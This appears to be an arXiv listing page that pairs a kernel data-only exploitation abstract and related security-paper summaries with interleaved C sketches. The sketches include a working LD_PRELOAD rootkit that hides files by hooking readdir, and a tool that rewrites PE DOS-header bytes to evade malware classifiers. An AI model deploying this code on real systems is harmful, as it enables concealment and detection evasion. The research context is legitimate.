Beyond Control: Exploring Novel File System Objects for Data-Only Attacks on Linux Systems
- URL: http://arxiv.org/abs/2401.17618v2
- Date: Sat, 7 Sep 2024 22:49:29 GMT
- Title: Beyond Control: Exploring Novel File System Objects for Data-Only Attacks on Linux Systems
- Authors: Jinmeng Zhou, Jiayi Hu, Ziyue Pan, Jiaxun Zhu, Wenbo Shen, Guoren Li, Zhiyun Qian
- Abstract summary: We semi-automatically discover and evaluate exploitable non-control data within the file subsystem of the Linux kernel.
We use 18 real-world CVEs to evaluate the exploitability of the file system objects using various exploit strategies.
We develop 10 end-to-end exploits using a subset of CVEs against the kernel with all state-of-the-art mitigations enabled.
- Score: 15.913967348814323
- License: http://arxiv.org/licenses/nonexclusive-distrib/1.0/
- Abstract: The widespread deployment of control-flow integrity has propelled non-control data attacks into the mainstream. In the domain of OS kernel exploits, by corrupting critical non-control data, local attackers can directly gain root access or privilege escalation without hijacking the control flow. As a result, OS kernels have been restricting the availability of such non-control data. This forces attackers to continue to search for more exploitable non-control data in OS kernels. However, discovering unknown non-control data can be daunting because they are often tied heavily to semantics and lack universal patterns. We make two contributions in this paper: (1) discover critical non-control objects in the file subsystem and (2) analyze their exploitability. This work represents the first study, with minimal domain knowledge, to semi-automatically discover and evaluate exploitable non-control data within the file subsystem of the Linux kernel. Our solution utilizes a custom analysis and testing framework that statically and dynamically identifies promising candidate objects. Furthermore, we categorize these discovered objects into types that are suitable for various exploit strategies, including a novel strategy necessary to overcome the defense that isolates many of these objects. These objects have the advantage of being exploitable without requiring KASLR, thus making the exploits simpler and more reliable. We use 18 real-world CVEs to evaluate the exploitability of the file system objects using various exploit strategies. We develop 10 end-to-end exploits using a subset of CVEs against the kernel with all state-of-the-art mitigations enabled.
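To make "non-control data" concrete, the sketch below models the idea in plain user-space C. The struct, field names, and the direct assignment standing in for a kernel heap-corruption primitive are all illustrative stand-ins, not the paper's actual file-subsystem targets: the point is only that flipping a permission flag, with no code pointer ever touched, is enough to change the victim's behavior.

```c
/*
 * Minimal user-space model of a non-control data attack (illustration only:
 * the struct, field names, and the direct assignment standing in for a
 * kernel heap-corruption primitive are hypothetical, not the paper's actual
 * file-subsystem targets). No code pointer is ever overwritten; flipping a
 * single permission flag is enough to change the victim's behavior.
 */
#include <stdio.h>
#include <string.h>

#define MODE_READ  0x1u
#define MODE_WRITE 0x2u

struct fake_file {                 /* stand-in for a kernel file-like object */
    char path[32];
    unsigned int mode;             /* non-control data: a flags word         */
};

/* victim logic: writes only if the mode field allows it */
static int do_write(struct fake_file *f, const char *data)
{
    if (!(f->mode & MODE_WRITE)) {
        printf("write to %s denied\n", f->path);
        return -1;
    }
    printf("write to %s: %s\n", f->path, data);
    return 0;
}

int main(void)
{
    struct fake_file f;
    strcpy(f.path, "/etc/passwd");
    f.mode = MODE_READ;                             /* "opened" read-only    */

    do_write(&f, "attacker::0:0::/root:/bin/sh");   /* denied                */

    /* stand-in for a memory-corruption primitive that can set one bit in
     * this object: flip the write flag, no control-flow hijack required    */
    f.mode |= MODE_WRITE;

    do_write(&f, "attacker::0:0::/root:/bin/sh");   /* now succeeds          */
    return 0;
}
```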
Related papers
- DATABench: Evaluating Dataset Auditing in Deep Learning from an Adversarial Perspective [59.66984417026933]
We introduce a novel taxonomy, classifying existing methods based on their reliance on internal features (IF) (inherent to the data) versus external features (EF) (artificially introduced for auditing).
We formulate two primary attack types: evasion attacks, designed to conceal the use of a dataset, and forgery attacks, intending to falsely implicate an unused dataset.
Building on the understanding of existing methods and attack objectives, we further propose systematic attack strategies: decoupling, removal, and detection for evasion; adversarial example-based methods for forgery.
Our benchmark, DATABench, comprises 17 evasion attacks, 5 forgery attacks, and 9
arXiv Detail & Related papers (2025-07-08T03:07:15Z) - User-space library rootkits revisited: Are user-space detection mechanisms futile? [0.0]
This work aims to answer the question: Is detecting user-space rootkits with user-space tools futile?
Contrary to the prevailing view that considers it effective, we argue that the detection of user-space rootkits cannot be done in user-space at all.
This manuscript describes the classical approach to building user-space library rootkits, the traditional detection mechanisms, and different evasion techniques.
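As background for the "classical approach" the paper revisits, user-space library rootkits are conventionally built as LD_PRELOAD shared objects that interpose on libc calls. The sketch below follows that textbook pattern (it is not code from the paper, and the prefix is hypothetical): it hides directory entries by hooking readdir.

```c
/*
 * Classic user-space library rootkit pattern (textbook illustration, not
 * code from the paper): an LD_PRELOAD shared object that interposes on
 * readdir() and hides entries starting with a chosen prefix.
 * Build: gcc -shared -fPIC -o hide.so hide.c -ldl
 * Use:   LD_PRELOAD=./hide.so ls     # "rk_*" entries disappear
 */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <stddef.h>
#include <string.h>

#define HIDE_PREFIX "rk_"          /* hypothetical prefix to conceal         */

struct dirent *readdir(DIR *dirp)
{
    /* resolve the real libc readdir once */
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    if (!real_readdir)
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");

    /* skip entries that should stay hidden, pass everything else through;
     * a real rootkit would also hook readdir64, stat, fopen, etc., and
     * user-space detectors try to spot exactly this kind of interposition  */
    struct dirent *e;
    while ((e = real_readdir(dirp)) != NULL) {
        if (strncmp(e->d_name, HIDE_PREFIX, strlen(HIDE_PREFIX)) != 0)
            return e;
    }
    return NULL;                   /* end of directory                       */
}
```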
arXiv Detail & Related papers (2025-06-09T14:50:48Z) - CANTXSec: A Deterministic Intrusion Detection and Prevention System for CAN Bus Monitoring ECU Activations [53.036288487863786]
We propose CANTXSec, the first deterministic Intrusion Detection and Prevention system based on physical ECU activations.
It detects and prevents classical attacks on the CAN bus, while detecting advanced attacks that have been less investigated in the literature.
We prove the effectiveness of our solution on a physical testbed, where we achieve 100% detection accuracy in both classes of attacks while preventing 100% of FIAs.
arXiv Detail & Related papers (2025-05-14T13:37:07Z) - The Cost of Performance: Breaking ThreadX with Kernel Object Masquerading Attacks [16.54210795506388]
We show that popular real-time operating systems (RTOSs) lack essential security protections.
We identify a performance optimization practice in ThreadX that introduces security vulnerabilities, allowing for the circumvention of parameter sanitization processes.
We introduce an automated approach involving under-constrained symbolic execution to identify the Kernel Object Masquerading (KOM) Attack.
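The masquerading idea can be modeled with a short hedged sketch (the struct, ID constant, and service function below are hypothetical, not ThreadX internals): when a fast path validates a caller-supplied object only by a cheap ID word instead of full sanitization, attacker-controlled memory carrying that ID is accepted as a genuine kernel object.

```c
/*
 * Conceptual model of kernel object masquerading (struct, constant, and
 * service function are hypothetical, not ThreadX internals). For speed, the
 * service validates a caller-supplied object only by its ID word instead of
 * checking that the kernel actually created it, so attacker-controlled
 * memory carrying the right ID passes the check.
 */
#include <stdio.h>

#define QUEUE_ID 0x51554555u       /* ID word the fast path expects          */

struct fake_queue {
    unsigned int id;               /* the only field the fast path inspects  */
    unsigned int capacity;
};

/* fast-path service call: ID check replaces full parameter sanitization */
static int queue_send(struct fake_queue *q)
{
    if (q->id != QUEUE_ID) {
        printf("rejected: not a queue object\n");
        return -1;
    }
    printf("accepted: sending via queue with capacity %u\n", q->capacity);
    return 0;
}

int main(void)
{
    /* attacker-controlled buffer masquerading as a kernel queue object */
    struct fake_queue forged = { .id = QUEUE_ID, .capacity = 0xFFFFFFFFu };
    return queue_send(&forged);    /* the weak check accepts it              */
}
```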
arXiv Detail & Related papers (2025-04-28T05:01:35Z) - From Past to Present: A Survey of Malicious URL Detection Techniques, Datasets and Code Repositories [3.323388021979584]
Malicious URLs persistently threaten the cybersecurity ecosystem by either deceiving users into divulging private data or distributing harmful payloads to infiltrate host systems.
This review systematically analyzes methods from traditional blacklisting to advanced deep learning approaches.
Unlike prior surveys, we propose a novel modality-based taxonomy that categorizes existing works according to their primary data modalities.
arXiv Detail & Related papers (2025-04-23T06:23:18Z) - The Reversing Machine: Reconstructing Memory Assumptions [2.66610643553864]
A malicious kernel-level driver can bypass OS-level anti-virus mechanisms easily.
We present The Reversing Machine (TRM), a new hypervisor-based memory introspection design for reverse engineering.
We show that TRM can detect each threat and that, out of 24 state-of-the-art AV solutions, only TRM can detect the most advanced threats.
arXiv Detail & Related papers (2024-05-01T03:48:22Z) - Securing Monolithic Kernels using Compartmentalization [0.9236074230806581]
A single flaw in a non-essential part of the kernel can cause the entire operating system to fall under an attacker's control.
Kernel hardening techniques might prevent certain types of vulnerabilities, but they fail to address a fundamental weakness.
We propose a taxonomy that allows the community to compare and discuss future work.
arXiv Detail & Related papers (2024-04-12T04:55:13Z) - GuardFS: a File System for Integrated Detection and Mitigation of Linux-based Ransomware [8.576433180938004]
GuardFS is a file-system-based approach to investigating the integration of ransomware detection and mitigation.
Its bespoke overlay file system extracts data before files are accessed.
Models trained on this data are used by three novel defense configurations that obfuscate, delay, or track access to the file system.
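One concrete example of the kind of feature such a file-system-level detector can extract before access completes is the byte entropy of written data, since ciphertext looks near-random. The sketch below illustrates that single feature only and assumes nothing about GuardFS's actual feature set or models.

```c
/*
 * One simple feature a file-system-level ransomware detector could extract
 * from writes before they reach disk: byte entropy, since encrypted output
 * is close to the 8-bit maximum. Illustration only; GuardFS's actual
 * feature set and models are described in the paper, not reproduced here.
 * Build: gcc -o entropy entropy.c -lm
 */
#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Shannon entropy of a buffer, in bits per byte (0.0 .. 8.0) */
static double byte_entropy(const unsigned char *buf, size_t len)
{
    size_t counts[256] = {0};
    for (size_t i = 0; i < len; i++)
        counts[buf[i]]++;

    double h = 0.0;
    for (int b = 0; b < 256; b++) {
        if (counts[b] == 0)
            continue;
        double p = (double)counts[b] / (double)len;
        h -= p * log2(p);
    }
    return h;
}

int main(void)
{
    unsigned char text[4096], random_like[4096];
    memset(text, 'A', sizeof(text));                   /* plaintext-like write  */
    for (size_t i = 0; i < sizeof(random_like); i++)   /* ciphertext-like write */
        random_like[i] = (unsigned char)rand();

    printf("plaintext-like  entropy: %.2f bits/byte\n",
           byte_entropy(text, sizeof(text)));
    printf("ciphertext-like entropy: %.2f bits/byte\n",
           byte_entropy(random_like, sizeof(random_like)));

    /* a defense configuration could delay, track, or block writes whose
     * entropy stays above a threshold across many files                     */
    return 0;
}
```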
arXiv Detail & Related papers (2024-01-31T15:33:29Z) - OutCenTR: A novel semi-supervised framework for predicting exploits of vulnerabilities in high-dimensional datasets [0.0]
We make use of outlier detection techniques to predict vulnerabilities that are likely to be exploited.
We propose a dimensionality reduction technique, OutCenTR, that enhances the baseline outlier detection models.
The results of our experiments show, on average, a 5-fold improvement in F1 score compared with state-of-the-art dimensionality reduction techniques.
arXiv Detail & Related papers (2023-04-03T00:34:41Z) - DRSM: De-Randomized Smoothing on Malware Classifier Providing Certified Robustness [58.23214712926585]
We develop a certified defense, DRSM (De-Randomized Smoothed MalConv), by redesigning the de-randomized smoothing technique for the domain of malware detection.
Specifically, we propose a window ablation scheme to provably limit the impact of adversarial bytes while maximally preserving local structures of the executables.
We are the first to offer certified robustness in the realm of static detection of malware executables.
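The window-ablation idea can be sketched as follows: each vote sees only one window of the byte sequence, so adversarial bytes confined to a few windows can flip only that many votes. In the sketch below the base classifier is a toy signature check standing in for MalConv, and the scheme is simplified relative to DRSM.

```c
/*
 * Sketch of the window-ablation / majority-vote idea behind de-randomized
 * smoothing on byte sequences (simplified model: the base classifier is a
 * toy signature check standing in for MalConv, and details differ from
 * DRSM). Each vote sees only one window, so adversarial bytes confined to
 * k windows can change at most k votes.
 */
#include <stdio.h>
#include <string.h>

#define WINDOW 8                   /* window size in bytes (toy value)       */

/* toy base classifier: "malicious" if the window contains the tag "EVIL" */
static int classify_window(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(buf + i, "EVIL", 4) == 0)
            return 1;
    return 0;
}

/* smoothed classifier: one vote per window, strict majority decides */
static int classify_smoothed(const unsigned char *bytes, size_t len)
{
    size_t malicious = 0, total = 0;
    for (size_t off = 0; off < len; off += WINDOW) {
        size_t n = (len - off < WINDOW) ? len - off : WINDOW;
        malicious += (size_t)classify_window(bytes + off, n);
        total++;
    }
    printf("%zu/%zu windows voted malicious\n", malicious, total);
    return 2 * malicious > total;
}

int main(void)
{
    unsigned char sample[64];
    memset(sample, 0x90, sizeof(sample));     /* filler bytes                */
    memcpy(sample +  0, "EVIL", 4);           /* signature in 5 of 8 windows */
    memcpy(sample +  8, "EVIL", 4);
    memcpy(sample + 24, "EVIL", 4);
    memcpy(sample + 40, "EVIL", 4);
    memcpy(sample + 56, "EVIL", 4);

    printf("verdict: %s\n",
           classify_smoothed(sample, sizeof(sample)) ? "malicious" : "benign");
    return 0;
}
```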
arXiv Detail & Related papers (2023-03-20T17:25:22Z) - Few-Shot Backdoor Attacks on Visual Object Tracking [80.13936562708426]
Visual object tracking (VOT) has been widely adopted in mission-critical applications, such as autonomous driving and intelligent surveillance systems.
We show that an adversary can easily implant hidden backdoors into VOT models by tampering with the training process.
We show that our attack is resistant to potential defenses, highlighting the vulnerability of VOT models to potential backdoor attacks.
arXiv Detail & Related papers (2022-01-31T12:38:58Z) - VELVET: a noVel Ensemble Learning approach to automatically locate VulnErable sTatements [62.93814803258067]
This paper presents VELVET, a novel ensemble learning approach to locate vulnerable statements in source code.
Our model combines graph-based and sequence-based neural networks to successfully capture the local and global context of a program graph.
VELVET achieves 99.6% and 43.6% top-1 accuracy over synthetic data and real-world data, respectively.
arXiv Detail & Related papers (2021-12-20T22:45:27Z) - No Need to Know Physics: Resilience of Process-based Model-free Anomaly Detection for Industrial Control Systems [95.54151664013011]
We present a novel framework to generate adversarial spoofing signals that violate physical properties of the system.
We analyze four anomaly detectors published at top security conferences.
arXiv Detail & Related papers (2020-12-07T11:02:44Z) - Dos and Don'ts of Machine Learning in Computer Security [74.1816306998445]
Despite great potential, machine learning in security is prone to subtle pitfalls that undermine its performance.
We identify common pitfalls in the design, implementation, and evaluation of learning-based security systems.
We propose actionable recommendations to support researchers in avoiding or mitigating the pitfalls where possible.
arXiv Detail & Related papers (2020-10-19T13:09:31Z) - Adversarial EXEmples: A Survey and Experimental Evaluation of Practical Attacks on Machine Learning for Windows Malware Detection [67.53296659361598]
Adversarial EXEmples can bypass machine learning-based detection by perturbing relatively few input bytes.
We develop a unifying framework that not only encompasses and generalizes previous attacks against machine-learning models, but also includes three novel attacks.
These attacks, named Full DOS, Extend and Shift, inject the adversarial payload by respectively manipulating the DOS header, extending it, and shifting the content of the first section.
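To ground the "Full DOS" variant, the sketch below rewrites only the DOS-header slack of a PE file: the Windows loader needs just the MZ magic at offset 0 and the e_lfanew pointer at offset 0x3C, so the bytes in between can carry adversarial content without breaking execution. This is a layout illustration, not the paper's attack code, and the payload is a dummy fill.

```c
/*
 * Layout sketch for the "Full DOS" manipulation (illustration only, not the
 * paper's attack code; the payload is a dummy fill, and you should run this
 * only on a throwaway copy of an executable). The Windows loader needs just
 * the MZ magic at offset 0 and the e_lfanew pointer at offset 0x3C, so the
 * 58 DOS-header bytes in between are slack that can be rewritten without
 * breaking execution.
 */
#include <stdio.h>
#include <string.h>

#define E_LFANEW_OFF 0x3C          /* offset of the pointer to the PE header */

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <copy-of-pe-file>\n", argv[0]);
        return 1;
    }
    FILE *f = fopen(argv[1], "r+b");
    if (!f) { perror("fopen"); return 1; }

    unsigned char hdr[0x40];
    if (fread(hdr, 1, sizeof(hdr), f) != sizeof(hdr) ||
        hdr[0] != 'M' || hdr[1] != 'Z') {
        fprintf(stderr, "not an MZ/PE file\n");
        fclose(f);
        return 1;
    }

    /* overwrite only the unused DOS-header bytes, keeping e_magic (offsets
     * 0-1) and e_lfanew (offsets 0x3C-0x3F) intact                          */
    unsigned char payload[E_LFANEW_OFF - 2];
    memset(payload, 0xAA, sizeof(payload));   /* dummy stand-in for adv. bytes */
    fseek(f, 2, SEEK_SET);
    fwrite(payload, 1, sizeof(payload), f);
    fclose(f);

    printf("rewrote %zu DOS-header slack bytes\n", sizeof(payload));
    return 0;
}
```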
arXiv Detail & Related papers (2020-08-17T07:16:57Z)
This list is automatically generated from the titles and abstracts of the papers on this site.
This site does not guarantee the quality of the listed information and is not responsible for any consequences of its use.